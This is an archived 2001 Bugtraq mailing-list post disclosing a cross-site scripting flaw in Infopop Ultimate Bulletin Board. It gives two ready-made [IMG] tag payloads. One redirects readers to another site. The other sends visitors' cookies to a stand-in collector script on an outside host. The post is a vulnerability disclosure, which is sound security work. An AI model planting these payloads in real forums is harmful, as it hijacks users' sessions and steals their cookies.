UBB vulnerablietis + about: using example

From: kyprizel (kyprizelat_private)
Date: Thu Nov 15 2001 - 11:10:50 PST

Next message: Peter W: "Re: Microsoft IE cookies readable via about: URLS"

Previous message: Georgi Guninski: "Several javascript vulnerabilities in Opera"
Next in thread: David Dreezer: "Re: UBB vulnerablietis + about: using example"
Reply: David Dreezer: "Re: UBB vulnerablietis + about: using example"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Здравствуйте, уважаемый(ая) bugtraq,
  Posting something like this UBB tag:
  [IMG]http://about:test"onerror="top.location.href='http://punk.tomsk.ru';[/IMG]
  to Infopop Ultimate Bulletin
  Board, we are able to redirect users browser to http://punk.tomsk.ru
  There are many ways to stole cookies using this vulnerabliety, one
  of them:
  [IMG]http://about:test"onerror="this.src='http://somedomain.com/yourscript.php';[/IMG]
   and yourscript.php - is a script to recieve users cookies 8)
  
  


  --
 // Э.Заитов AKA kyprizel                        mailto:kyprizelat_private
                                                 ICQ#3337333
  --
 "Knowlege itself is power..."
  F.Bacon
  --

Next message: Peter W: "Re: Microsoft IE cookies readable via about: URLS"
Previous message: Georgi Guninski: "Several javascript vulnerabilities in Opera"
Next in thread: David Dreezer: "Re: UBB vulnerablietis + about: using example"
Reply: David Dreezer: "Re: UBB vulnerablietis + about: using example"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Nov 15 2001 - 13:57:06 PST